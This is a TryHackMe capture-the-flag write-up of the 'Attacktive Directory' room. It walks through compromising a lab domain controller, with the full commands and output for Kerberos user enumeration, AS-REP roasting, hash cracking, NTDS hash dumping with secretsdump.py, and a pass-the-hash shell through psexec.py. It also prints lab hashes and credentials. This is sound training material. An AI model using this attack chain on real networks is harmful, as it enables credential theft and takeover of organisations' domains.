THM: Attacktive Directory
In this article, I step through the process of exploiting a domain controller by enumerating services running on open ports, abusing Kerberos features, and elevating my privileges on the domain controller to gather all the challenge flags. This challenge is available on the TryHackMe platform and is titled “Attacktive Directory”, created by the user “spooky”.
Disclaimer
I like to add a brief disclaimer before a writeup to encourage people to attempt the room before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the challenge more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, lets get started!
What is Active Directory?
Active directory is a service developed by Microsoft to manage Windows domain networks and stores information related to objects, such as computers, users, printers, etc. This makes it easier for administrators and users to find and use information about objects. In Active Directory, there is a server called a domain controller. The domain controller provides authentication and authorization services, replicates updates to other domain controllers in the domain/forest, and allows administrative access to manage user accounts and network resources.
Port Service Enumeration
I started enumerating the target machine by performing a quick scan with NMAP to identify any open ports.
nmap -T5 --open -sS -vvv --min-rate=300 --max-retries=3 -p- -oN all-ports-nmap-report 10.10.253.179PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 125
80/tcp open http syn-ack ttl 125
88/tcp open kerberos-sec syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125
139/tcp open netbios-ssn syn-ack ttl 125
389/tcp open ldap syn-ack ttl 125
445/tcp open microsoft-ds syn-ack ttl 125
464/tcp open kpasswd5 syn-ack ttl 125
593/tcp open http-rpc-epmap syn-ack ttl 125
636/tcp open ldapssl syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
5985/tcp open wsman syn-ack ttl 125
9389/tcp open adws syn-ack ttl 125
47001/tcp open winrm syn-ack ttl 125
49664/tcp open unknown syn-ack ttl 125
49665/tcp open unknown syn-ack ttl 125
49666/tcp open unknown syn-ack ttl 125
49669/tcp open unknown syn-ack ttl 125
49672/tcp open unknown syn-ack ttl 125
49673/tcp open unknown syn-ack ttl 125
49674/tcp open unknown syn-ack ttl 125
49678/tcp open unknown syn-ack ttl 125
49684/tcp open unknown syn-ack ttl 125
49695/tcp open unknown syn-ack ttl 125
Reviewing the output, I can see that there are twenty-four ports open. I next used NMAP to identify the services running on each port and used the common NSE scripts to find any common vulnerabilities that I could exploit.
nmap -sV -sC -Pn -v -oN nmap-report -p 53,80,88,135,139,389,445,464,593,636,3389,5985,9389,47001,49664,49665,49666,49669,49672,49673,49674,49678,49684,49695 10.10.253.179PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-20 15:08:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-20T15:10:30+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Issuer: commonName=AttacktiveDirectory.spookysec.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-03-19T14:57:07
| Not valid after: 2022-09-18T14:57:07
| MD5: 98b7 aa02 99ce 8fac 662f 00bb 1c1f 2924
|_SHA-1: 6c83 7335 c65a 610b 4477 d012 08b9 2223 aed5 ebd0
|_ssl-date: 2022-03-20T15:10:46+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
I can see some interesting services identified by NMAP running on the open ports that we can further enumerate.
SMB Enumeration
I can see that ports 139 and 445 are open. Ports 139 and 445 are used for authentication and file sharing. There are multiple tools available to enumerate port 139/445. We can start by using enum4linux to find information about shares on the target.
# -a: does all simple enumeration(-U -S -G -P -r -o -n -i).
$ enum4linux -a 10.10.201.126============================================
| Getting domain SID for 10.10.201.126 |
============================================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
This provides us with some useful information, such as the NetBIOS-Domain Name of the machine, which is the subdomain of the DNS domain name.
RDP Enumeration
Continuing to review the output from the NMAP scans performed earlier, I can see some additional Windows host and domain information being disclosed on port 3389 (RDP).
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-20T15:10:30+00:00I can also see that the top-level domain (TLD) .local was used, which was commonly used by people in the past for their Active Directory Domain but should now be avoided according to the Active Directory Naming FAQ.
Kerberos Enumeration & Exploitation
Kerberos is a key authentication service within Active Directory that runs on port 88. We can use the tool kerbrute to enumerate users, which can be used to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.
./kerbrute_linux_amd64 userenum --dc 10.10.253.179 -d spookysec.local -o kerbrute-user-enum userlist2022/03/20 15:34:28 > Using KDC(s):
2022/03/20 15:34:28 > 10.10.253.179:882022/03/20 15:34:29 > [+] VALID USERNAME: james@spookysec.local
2022/03/20 15:34:35 > [+] VALID USERNAME: svc-admin@spookysec.local
2022/03/20 15:34:44 > [+] VALID USERNAME: James@spookysec.local
2022/03/20 15:34:47 > [+] VALID USERNAME: robin@spookysec.local
2022/03/20 15:35:14 > [+] VALID USERNAME: darkstar@spookysec.local
2022/03/20 15:35:37 > [+] VALID USERNAME: administrator@spookysec.local
2022/03/20 15:36:11 > [+] VALID USERNAME: backup@spookysec.local
2022/03/20 15:36:32 > [+] VALID USERNAME: paradox@spookysec.local
2022/03/20 15:39:16 > [+] VALID USERNAME: Robin@spookysec.local
2022/03/20 15:43:20 > [+] VALID USERNAME: Administrator@spookysec.local
2022/03/20 15:51:29 > [+] VALID USERNAME: Darkstar@spookysec.local
2022/03/20 15:54:07 > [+] VALID USERNAME: Paradox@spookysec.local
2022/03/20 16:02:39 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2022/03/20 16:04:59 > [+] VALID USERNAME: ori@spookysec.local
2022/03/20 16:11:05 > [+] VALID USERNAME: ROBIN@spookysec.local
2022/03/20 16:25:53 > Done! Tested 73317 usernames (16 valid) in 3084.883 seconds
We can see that there are 16 accounts discovered, including a service admin account (i.e. svc-admin) and a backup account, which are of particular interest. Using the newly discovered list of accounts, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting.
ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
We can retrieve Kerberos tickets using a tool called “GetNPUsers.py” in Impacket. This allows us to query ASREProastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames, which we enumerated previously via Kerbrute.
python3 GetNPUsers.py spookysec.local/ -dc-ip 10.10.253.179 -usersfile kerberos-usernames -no-pass -request -outputfile kerberos-users-foundAfter running “GetNPUsers.py”, I can see that you can query a ticket with no password from the svc-admin user account.
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337cNext, we can use Hashcat to crack the “Kerberos 5 AS-REP etype 23” hash retrieved from the KDC.
hashcat64.exe -m 18200 -a 0 hash.txt rockyou.txt -o cracked.txt<hash>:mana**********
This provides us with a set of credentials that we can now use to enumerate any shares that the domain controller may be giving out.
SMB Enumeration (Cont.)
Using the svc-admin credentials, I can now further enumerate the shares on the DC. I can use the tool smbclient to list the shares on the DC.
smbclient -L //10.10.200.95 -U svc-admin
Enter WORKGROUP\svc-admin's password: Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
I can see six shares being listed by the server, including a share called backup. This share contains a text file called “backup_credentials.txt”, which contains base64 encoded text. Decoding this text provides credentials for the backup user account.
Domain Privilege Escalation
According to the challenge description, the backup account has a unique permission that allows all Active Directory changes to be synced with this user account, including password hashes. We can use a tool called “secretsdump.py” within Impacket to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer.
python3 secretsdump.py spookysec.local/backup:'backup2517860'@10.10.25.158 -just-dcThe “secretsdump.py” uses the DRSUAPI method to get NTDS.DIT secrets.
The Ntds. dit file is a database that stores Active Directory data, including information about user objects, groups and group membership. Importantly, the file also stores the password hashes for all users in the domain.
This tool dumps the NTLM hashes for all the users on the DC machine.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::.....etc.....
Pass The Hash (PtH) Attack
An attack method that could allow us to authenticate as the user without the password is the Pass The Hash attack.
Pass the Hash attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems.
There are multiple tools that can be used to perform a pass the hash attack, including Evil-WinRM, crackmapexec, and psexec.py. I had difficulty getting Evil-WinRM to work but was able to use psexec.py to get a shell with the Administrator NTLM hash.
python3 psexec.py Administrator@10.10.25.158 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fcImpacket v0.9.24 - Copyright 2021 SecureAuth Corporation[*] Requesting shares on 10.10.200.95.....
[*] Found writable share ADMIN$
[*] Uploading file eanlOsfQ.exe
[*] Opening SVCManager on 10.10.200.95.....
[*] Creating service GzYy on 10.10.200.95.....
[*] Starting service GzYy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>
From here, I effectively have full control over the AD Domain and can retrieve all three flags.
Final Thoughts
I really enjoyed working through this room and getting the opportunity to learn more about exploiting an Active Directory domain controller. Thank you for reading till the end and keep hacking 😄!
